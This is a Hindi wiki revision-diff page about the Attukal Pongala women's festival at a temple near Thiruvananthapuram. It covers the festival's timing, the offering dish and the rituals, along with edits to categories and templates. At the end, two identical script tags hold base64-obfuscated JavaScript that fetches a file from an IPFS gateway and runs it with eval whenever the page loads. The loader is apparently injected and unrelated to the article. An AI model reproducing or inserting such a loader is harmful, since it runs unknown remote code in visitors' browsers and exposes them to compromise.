Difference between revisions of "अट्टुकल पोंगल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "शुरूआत" to "शुरुआत")
 
(10 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{लेख सूची|लेख का नाम=तिरुअनंतपुरम|पर्यटन=तिरुअनंतपुरम पर्यटन|ज़िला=तिरुअनंतपुरम ज़िला}}
 
*[[केरल]] की राजधानी [[तिरुअनंतपुरम]] में कई [[तिरुअनंतपुरम पर्यटन|पर्यटन स्थल]] हैं जिनमें से एक अट्टुकल पोंगल उत्सव हैं।
 
 
*अट्टुकल पोंगल महिलाओं द्वारा मनाया जाने वाला एक प्रसिद्ध उत्सव है।  
 
*अट्टुकल पोंगल महिलाओं द्वारा मनाया जाने वाला एक प्रसिद्ध उत्सव है।  
 
*यह उत्सव तिरुवनंतपुरम से 2 किलोमीटर दूर देवी के प्राचीन मंदिर में मनाया जाता है।  
 
*यह उत्सव तिरुवनंतपुरम से 2 किलोमीटर दूर देवी के प्राचीन मंदिर में मनाया जाता है।  
*10 दिनों तक चलने वाले पोंगल उत्सव की शुरुआत मलयालम माह मकरम-कुंभम ([[फ़रवरी]]-[[मार्च]]) के भरानी दिवस ([[कार्तिक]] चंद्र) को होती है।
+
*10 दिनों तक चलने वाले [[पोंगल]] उत्सव की शुरुआत मलयालम माह मकरम-कुंभम ([[फ़रवरी]]-[[मार्च]]) के भरानी दिवस ([[कार्तिक]] चंद्र) को होती है।
*पोंगल एक प्रकार का व्यंजन है जिसे गुड़, नारियल और केले के निश्चित मात्रा को मिलाकर बनाया जाता है।  
+
*पोंगल एक प्रकार का व्यंजन है जिसे गुड़, नारियल और [[केला|केले]] के निश्चित मात्रा को मिलाकर बनाया जाता है।  
 
*ऐसा माना जाता है कि यह देवी का पसंदीदा पकवान है।  
 
*ऐसा माना जाता है कि यह देवी का पसंदीदा पकवान है।  
 
*अट्टुकल पोंगल में धार्मिक कार्य प्रात:काल ही शुरू हो जाते हैं और दोपहर तक चढ़ावा तैयार कर दिया जाता है।  
 
*अट्टुकल पोंगल में धार्मिक कार्य प्रात:काल ही शुरू हो जाते हैं और दोपहर तक चढ़ावा तैयार कर दिया जाता है।  
 
*पोंगल के दौरान पुरुषों का मंदिर में प्रवेश वर्जित होता है।  
 
*पोंगल के दौरान पुरुषों का मंदिर में प्रवेश वर्जित होता है।  
*मुख्य पुजारी देवी की तलवार हाथों में लेकर मंदिर प्रांगण में घूमता है और भक्तों पर पवित्र [[जल]] और [[पुष्प]] वर्षा करता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=383 |title=देवताओं की नगरी के नाम से मशहूर |accessmonthday=[[21 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=हिन्दी }}</ref>
+
*मुख्य पुजारी देवी की तलवार हाथों में लेकर मंदिर प्रांगण में घूमता है और भक्तों पर पवित्र [[जल]] और [[पुष्प]] वर्षा करता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=383 |title=देवताओं की नगरी के नाम से मशहूर |accessmonthday=[[21 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=[[हिन्दी]] }}</ref>
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 17: Line 15:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{केरल के पर्यटन स्थल}}
+
{{पर्व और त्योहार}}
[[Category:केरल]]
+
{{व्रत और उत्सव}}
[[Category:केरल के पर्यटन स्थल]]
+
 
[[Category:तिरुअनंतपुरम]]
+
[[Category:व्रत और उत्सव]]
[[Category:पर्यटन कोश]]
+
[[Category:पर्व और त्योहार]]
 +
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 10:01, 28 July 2011

  • attukal poangal mahilaoan dvara manaya jane vala ek prasiddh utsav hai.
  • yah utsav tiruvanantapuram se 2 kilomitar door devi ke prachin mandir mean manaya jata hai.
  • 10 dinoan tak chalane vale poangal utsav ki shuruat malayalam mah makaram-kuanbham (faravari-march) ke bharani divas (kartik chandr) ko hoti hai.
  • poangal ek prakar ka vyanjan hai jise gu d, nariyal aur kele ke nishchit matra ko milakar banaya jata hai.
  • aisa mana jata hai ki yah devi ka pasandida pakavan hai.
  • attukal poangal mean dharmik kary prat:kal hi shuroo ho jate haian aur dopahar tak chadhava taiyar kar diya jata hai.
  • poangal ke dauran purushoan ka mandir mean pravesh varjit hota hai.
  • mukhy pujari devi ki talavar hathoan mean lekar mandir praangan mean ghoomata hai aur bhaktoan par pavitr jal aur pushp varsha karata hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>